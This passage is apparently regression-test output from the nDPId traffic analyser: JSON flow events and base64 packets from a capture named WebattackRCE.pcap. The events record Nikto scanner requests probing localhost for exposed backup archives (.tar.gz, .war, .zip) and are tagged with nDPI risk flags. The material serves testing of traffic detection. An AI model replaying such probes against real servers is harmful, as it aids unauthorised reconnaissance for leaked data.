-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":356,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277239,"flow_last_seen":1576420277239,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277239,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50256,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":356,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":356,"flow_packet_id":1,"flow_last_seen":1576420277239,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277239,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/HMpAAEAGH21\/AAABfwAAAcRQH5BQEyRWh8Tqd4AYAED+swAAAQEICp1m\/R+dZv0eR0VUIC8xMjcuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":356,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277239,"flow_last_seen":1576420277239,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277239,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50256,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":357,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277240,"flow_last_seen":1576420277240,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277240,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50258,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":357,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":357,"flow_packet_id":1,"flow_last_seen":1576420277240,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420277240,"pkt":"AAAAAAAAAAAAAAAACABFAADGqKRAAEAGk4t\/AAABfwAAAcRSH5A2yZA9R5wqAoAYAED+ugAAAQEICp1m\/SCdZv0gR0VUIC9iYWNrdXAudGFyLmJ6MiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":357,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277240,"flow_last_seen":1576420277240,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277240,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50258,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":358,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277242,"flow_last_seen":1576420277242,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277242,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50260,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":358,"flow_packet_id":1,"flow_last_seen":1576420277242,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420277242,"pkt":"AAAAAAAAAAAAAAAACABFAADGoOxAAEAGm0N\/AAABfwAAAcRUH5C09Jh1W5zr34AYAED+ugAAAQEICp1m\/SKdZv0iR0VUIC9iYWNrdXAudGFyLmJ6MiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} 
-01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":358,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277242,"flow_last_seen":1576420277242,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277242,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50260,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":359,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277243,"flow_last_seen":1576420277243,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277243,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50262,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":359,"flow_packet_id":1,"flow_last_seen":1576420277243,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277243,"pkt":"AAAAAAAAAAAAAAAACABFAADIi9VAAEAGsFh\/AAABfwAAAcRWH5DRYLNOcO51UIAYAED+vAAAAQEICp1m\/SOdZv0jR0VUIC8xMjcuMC4wLjEudGFyLmd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":359,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277243,"flow_last_seen":1576420277243,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277243,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50262,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":360,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277244,"flow_last_seen":1576420277244,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277244,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50264,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":360,"flow_packet_id":1,"flow_last_seen":1576420277244,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277244,"pkt":"AAAAAAAAAAAAAAAACABFAADIKHJAAEAGE7x\/AAABfwAAAcRYH5BlBxDwgejT24AYAED+vAAAAQEICp1m\/SSdZv0kR0VUIC8xMjcuMC4wLjEudGFyLmd6IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":360,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277244,"flow_last_seen":1576420277244,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277244,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50264,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":361,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277246,"flow_last_seen":1576420277246,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277246,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50266,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":361,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":361,"flow_packet_id":1,"flow_last_seen":1576420277246,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277246,"pkt":"AAAAAAAAAAAAAAAACABFAADF\/A9AAEAGQCF\/AAABfwAAAcRaH5B2IcSTgB9qe4AYAED+uQAAAQEICp1m\/SWdZv0lR0VUIC8xMjdfMF8wXzEud2FyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
-01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":361,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277246,"flow_last_seen":1576420277246,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277246,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50266,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":362,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277247,"flow_last_seen":1576420277247,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277247,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50268,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":362,"flow_packet_id":1,"flow_last_seen":1576420277247,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277247,"pkt":"AAAAAAAAAAAAAAAACABFAADFi69AAEAGsIF\/AAABfwAAAcRcH5D\/WbMzZ3h33IAYAED+uQAAAQEICp1m\/SedZv0nR0VUIC8xMjdfMF8wXzEud2FyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":362,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277247,"flow_last_seen":1576420277247,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277247,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50268,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":363,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277248,"flow_last_seen":1576420277248,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277248,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50270,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":363,"flow_packet_id":1,"flow_last_seen":1576420277248,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277248,"pkt":"AAAAAAAAAAAAAAAACABFAADDpjtAAEAGlfd\/AAABfwAAAcReH5CBd56aTxXXOIAYAED+twAAAQEICp1m\/SidZv0oR0VUIC8xMjcuMC4wLnppcCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":363,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277248,"flow_last_seen":1576420277248,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277248,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50270,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":364,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277249,"flow_last_seen":1576420277249,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277249,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50272,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":364,"flow_packet_id":1,"flow_last_seen":1576420277249,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277249,"pkt":"AAAAAAAAAAAAAAAACABFAADDeldAAEAGwdt\/AAABfwAAAcRgH5A4o0L2zMH\/yIAYAED+twAAAQEICp1m\/SmdZv0pR0VUIC8xMjcuMC4wLnppcCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 
-01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":364,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277249,"flow_last_seen":1576420277249,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277249,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50272,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":365,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277252,"flow_last_seen":1576420277252,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277252,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50274,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":365,"flow_packet_id":1,"flow_last_seen":1576420277252,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277252,"pkt":"AAAAAAAAAAAAAAAACABFAADCJxNAAEAGFSF\/AAABfwAAAcRiH5BR2x+x8C2V44AYAED+tgAAAQEICp1m\/SydZv0rR0VUIC8xMjcudGFyLmd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":365,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277252,"flow_last_seen":1576420277252,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277252,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50274,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":366,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277253,"flow_last_seen":1576420277253,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277253,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50276,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":366,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":366,"flow_packet_id":1,"flow_last_seen":1576420277253,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277253,"pkt":"AAAAAAAAAAAAAAAACABFAADClhFAAEAGpiJ\/AAABfwAAAcRkH5B3iK6vsi1CtIAYAED+tgAAAQEICp1m\/S2dZv0tR0VUIC8xMjcudGFyLmd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":366,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277253,"flow_last_seen":1576420277253,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277253,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50276,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
